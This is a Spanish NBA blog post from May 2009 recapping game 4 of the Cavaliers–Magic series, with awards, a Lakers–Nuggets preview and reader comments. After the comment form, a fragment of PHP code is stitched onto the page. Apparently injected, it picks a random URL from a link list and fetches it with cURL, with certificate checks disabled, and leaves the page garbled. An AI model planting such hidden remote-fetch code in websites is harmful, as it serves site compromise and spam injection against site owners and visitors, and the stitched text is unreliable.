Playoffs (26/05/2009): Jaque al Rey

27 de May de 2009 por TheDeerHunter

leblossProblemas serios los que se les presentan a King James y sus Cavaliers. Regresan a Cleveland sin haber logrado rascar ningún punto en Orlando, preparándose para el primero de los dos match points en contra que tendrán que defender con uñas y dientes si no quieren irse de vacaciones tan pronto como mañana.

La balanza volvió a inclinarse del lado de Dwight Howard, en esta ocasión tras prórroga donde los milagros de LeBron no han resultado suficientes para sobrevivir.

Además de la formidable emoción del choque, se vieron otras constantes comunes a los anteriores partidos. Los Cavs fueron superiores en la primera mitad pero una vez más se dejaron remontar a partir del tercer cuarto, precisamente cuando logran ajustar mejor su defensa a los escuderos del Elegido. Como muestra, un botón: Mo Williams anotó 18 puntos como segundo espada sin demasiada efectividad. Todos ellos, antes del último cuarto. West, 17. El lanzamiento exterior que podría haber abierto la lata se quedó otra vez por debajo del 30% de acierto.

Definitivamente Ben Wallace ya no está para presentar batalla a nadie. Es difícil jugarse todo a la carta de que Varejao sea capaz de desgastar a Superman. Las posibilidades de su equipo iban evaporándose conforme caían las faltas en contra. Mucho más difícil si cabe, con el nivel que están desplegando Alston y Pietrus durante esta serie. 11 triples lograron anoche entre ambos. Cuando pensábamos en las dificultades que podían atravesar los Cavs parando el perímetro Magic, en ningún caso pensábamos en ellos. Por el contrario, LeBron se ha encontrado solo ante el peligro. Está visto que ni siquiera un ser sobrehumano como él puede ser capaz de ganar sin ayuda. Con todo, después de que Rashard Lewis adelantase a los suyos con un triple, James forzó la prórroga con dos tiros libres a 0.5 del final (tras una falta discutible), y en el tiempo suplementario aún dispuso de un postrero tiro para ganar el partido, en esta ocasión desde bastante más lejos. Ya habría sido la bomba.

alstondwightAsí pues, 3-1 para los Magic. Es la hora de los milagros en Cleveland. La hora de los héroes. La hora de LeBron.

PREMIOS

MVP: Cuando más importa, Dwight Howard está demostrando su capacidad de liderazgo desde la que se supone su peor faceta: los tiros libres.  Anoche volvió a firmar un muy buen porcentaje desde la línea al acertar con 7 de sus 9 lanzamientos. En total, Howard sumó 27 puntos, 14 rebotes, 4 asistencias y 3 tapones que dejan a los Magic a un paso de las Finales.

La sorpresa: Tenía una papeleta complicada, pero Rafer Alston está siendo capaz de hacernos olvidar a Jameer Nelson. En el cuarto partido, el ex Rockets se fue hasta los 26 puntos, con 4 asistencias y 2 robos.

La decepción: El teórico escudero de LeBron, Mo Williams, que tan fiable se había mostrado durante la temporada hasta el punto de reivindicarse para él una plaza en el All-Star Game, falló a ambos lados de la cancha. Erró 10 de sus 15 tiros, incluyendo sus tres triples, y se vio superado claramente por Alston. Su promesa de que estarían en las Finales empieza a resultar poco creíble.

El mayor esfuerzo en vano: Ya se sabe que cuando los Cavs pierden, LeBron tiene garantizado un sitio aquí. Anoche la mancha a su estadística fueron las 8 pérdidas de balón, además de ya habituales tiros libres fallados en el último cuarto. Tampoco logró un gran porcentaje en tiros de campo, pero sus 44 puntos, 12 rebotes y 7 asistencias son incuestionables.

lakersbenchlossRAZONES PARA TRASNOCHAR

Nuggets @ Lakers (3.00 hora peninsular española). Con aroma a séptimo se presenta el quinto partido de las finales del Oeste. Gasol reclama más balones en ataque, y bien harían los Lakers en proveer a su interior más desequilibrante. Sin embargo, más urgente parece el problema de la actitud y la falta de intensidad de muchos de los jugadores de Phil Jackson. El rendimiento del trío interior de los Nuggets ha sido clave en un par de partidos de la serie, aunque Andersen y compañía acostumbran a reducir sus prestaciones como visitantes. ¿Serán capaces los Lakers al fin de jugar un partido completo? ¿Habrá vida (y balonesto) más allá de Kobe & Pau? Más les vale a los angelinos si no quieren volver a Denver con la obligación de ganar.

Comenta

14 comentarios a esta entrada

  1. Educajasur dice:
    #1

    El título es tuyo? es muy bueno y acertado.
    Orlando-Denver??Factible final, pero poco esperada no?quien haya apostado puede llevarse un buen dinero 🙂
    Aunque espero y deseo que nustro Pau y “sus” Lakers lleguen a lo más alto.
    Saludos a todos los fans, y a seguir disfrutando de este espectáculo!!!!

      Citar

  2. Kantonyo dice:
    #2

    La verdad que una final Orlando-Denver no se la esperaba nadie a principio de temporada…. pero a día de hoy son los que mejor han jugado en sus respectivas finales de conferencia. Y repito si no hubiera sido por el triple imposible de LeBron ya estarían 4-0.

    De todas formas los Lakers todavía tienen el factor cancha a su favor y el partido de hoy es importantísimo. Yo creo que va a ser más dificil eliminar a Denver que jugar una final contra Orlando o Cleveland.

    pd: el unico ahora mismo capaz de remontar una eliminatoria 3-0 es LeBron….

      Citar

  3. Kantonyo dice:
    #3

    se me ha ido la pinza….. quería decir remontar un 3-1

      Citar

  4. xapa_croack dice:
    #4

    Segun daimiel, los magic con nelson sanote hubieran sido campeones del este de calle, claro lo dice ayer…

    Y howard esta a una tecnica de perderse un partido, ayer solo dijo fuck y se la sancionaron en una accion que casi le destrozan el cuello.

      Citar

  5. aro_pasado_no_newtoniano dice:
    #5

    ¿en qué posición dijo “fuck”?

    Grande el título¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡

      Citar

  6. TheDeerHunter dice:
    #6

    je, gracias por los peloteos… aunque si os he de ser sincero me parecía tan tópico que he tenido que revisar los posts del año pasado por si lo habíamos usado ya…

      Citar

  7. ÑBA dice:
    #7

    Grandísimo titular…

      Citar

  8. ÑBA dice:
    #8

    Y gran partido, que no me cupo en el 1º intento jeje

    El marcaje a Howard fue de risa…

      Citar

  9. couxe dice:
    #9

    Hoy los Cavs se la juegan… Sería una catástrofe con muy pocos precedentes que tras una temporada como la suya pifiasen en la final de conferencia por un contundente 4-1 y sin ninguna excusa de bajas, lesiones, etc… y contra un equipo teóricamente inferior y más castigado por las lesiones y el cansancio…
    Así pues, con un 3-1 en contra, “The chosen one” y los suyos deben superar este match ball e intentar obrar el milagro…

    Llegados a este punto, y aunque no soy mucho de teorías conspirativas, voy a ponerme un poco paranoico…

    En aras al espectáculo que se avecina, todo el mundo debe colaborar… las televisiones con sus grandes despliegues, las aficiones llenando el estadio, los jugadores técnicos y famosos calentando el ambiente con grandes declaraciones, etc… todo el mundo, incluidos los árbitros… sería antiamericano hacer lo contrario…

    Todo preparado pues para que los Cavs apelen a la épica y la heroica… para que “el elegido” comience a forjar leyenda… y que se preparen los de Orlando para el arbitraje de excepción… y para que lo “amazing”, que tanto vende, reciba un empujoncito de parte de la liga…

    ¿Dejarán que los de Orlando tengan alguna posibilidad en este siguiente partido…?, ¿o esperarán a ver si los Cavs pueden hacer el trabajo por sí mismos…?
    ¿Le caerá una nueva técnica a Howard, allanando así la posibilidad de un 6º o incluso un posterior 7º partido a vida o muerte…? Sería todo un $ueño para $tern…

    Yo desde luego, cumpliéndose o no mis paranoias, este partido no me lo pierdo…

      Citar

  10. TheDeerHunter dice:
    #10

    Pues mal momento para exponer tus “paranoias”. A Supermán le han anulado su última técnica.
    Aunque igual no le iría mal seguir amenazado… porque Kobe está jugando mucho más focalizado sin tanta queja.

      Citar

  11. couxe dice:
    #11

    Bueno, pues fuera ya de paranoias, conspiraciones y coñas varias, me alegro bastante de que se la hayan quitado ya que fue una chuminada…
    Espero que ganen los Cavs para poder ver al menos otro partido más, ya que está siendo una elimitaroria bastante bonita…
    En cualquier caso me da que hoy toca arbitraje caserillo…

      Citar

  12. Kantonyo dice:
    #12

    Yo entiendo a Couxe, por que el partido donde James ganó con ‘el triple’, quedando un segundo, pensé seguro que LeBron la mete, y sale como un heroe, seguro que la mete con solo un segundo y mañana es noticia en el mundo entero, seguro que la mete por que los americanos necesitan crear heroes, seguro que la mete …bla bla bla… pero cuando la metió desde donde la metió y como la metió…. dije joer es imposible que esto este preparado y si lo estuviera, tendría el mismo merito.

    Por lo tanto no hay que descartar una remontada épica de los Cavs con LeBron al frente.

      Citar

  13. couxe dice:
    #13

    Joder… veo que ni aclarando antes y después…
    De aquí en adelante me ciño al juego en sí y me dejo de coñas…

      Citar

  14. TheDeerHunter dice:
    #14

    un articulito de David Aldridge acerca de las teorias conspiratorias (en inglés):
    http://www.nba.com/2009/news/features/david_aldridge/05/28/daily.dose/index.html

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>